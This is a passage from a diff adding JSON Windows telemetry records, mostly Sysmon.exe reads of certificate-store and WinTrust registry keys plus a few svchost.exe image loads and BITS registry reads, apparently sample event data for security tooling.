"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "FlightSettings.dll", + "image_path": "C:\\Windows\\System32\\FlightSettings.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 